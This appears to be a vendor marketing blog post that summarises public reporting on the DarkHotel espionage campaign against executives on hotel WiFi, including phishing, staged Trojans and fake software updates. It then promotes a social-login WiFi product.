Dark Hotel Is No Joke

Active for over a decade, "Dark Hotel" is once again targeting business travelers in luxury hotels through their WiFi. And no one knows, as yet, whether these are software exploits accomplished remotely or if hotel staff & vendors include infiltrators physically accessing hardware.

Their tactics are considered evolutionary, combining phishing/social engineering and one or more Trojans. The ony thing clear - and then, only generaly - is their targets: CEOs, upper-level corporate officials, and those involved in research and development personnel.

The phishing/social engineering part might begin with "carefully crafted phishing email targeted to one person" according to a BitDefender senior analyst.

An interesting and convincing email. With an email list, perhaps, of contacts in Pyongyang (North Korea). Phishing. Using social engineering arts to deliver a self-extracting archive like winword.exe, which opens a Trojan download once executed. Stage 2 has the malware running a legitimate Microsoft HTML Application host to download the second part, compromising the target.

But the deliveries are in stages, with the first hides malicious codes and strings inside a legitimate library code, and statically linking the two. This is where "evolutionary" appears. "Malware that updates." The multi-stage Trojan download keeps up with improvements in victims' defenses.

According to ZDNet, the "single target" nature of the phish points toward government and political targets. New tactics include new malware (known as Inexsmar) to attack political targets. Similarities in "payloads" are how the connection between DarkHotel and Inexsmar was made. It's espionage.

"Competitive" means Dark Hotel "never goes after the same target twice; they perform operations with surgical precision, getting all the valuable data they can from the first contact, deleting traces of their work and melting into the background to await the next high profile individual" as a security team at Kaspersky put it.

The targets mentioned above were from the financial industry, pharmaceuticals and technology companies, as well as the military, police and "contractors". Once they connect to compromised hotel WiFi, they're tricked into downloading and installing what they think is an update for Google Toolbar, Adobe Flash or Windows Messenger, when it's actually a backdoor masquerading as legitimate.

At that point, the backdoor can download keyloggers, steal passwords by recording keystrokes and obtain sensitive, corporate information. The attackers delete their own tools, go back into hiding, and lurk while they waiting for the next target.

Some say "You can't fix stupid." But some of the smartest people can be fooled by well crafted phishing and social engineering. Every day we hear about another "exploit", and advice to "Get the latest updates NOW". It can happen even on a wired connection.But Social WiFi can improve your odds when hotels, restaurants, and other businesses take advantage of it. It also lets business owners "Know Customers Like Family". Even local small snall businesses can afford the additional security. We made sure of that.

Delivering timed, personal, and relevant customer-, patron- and guest-messaging helps business. Secure WiFi is easier with login buttons provided by social media giants.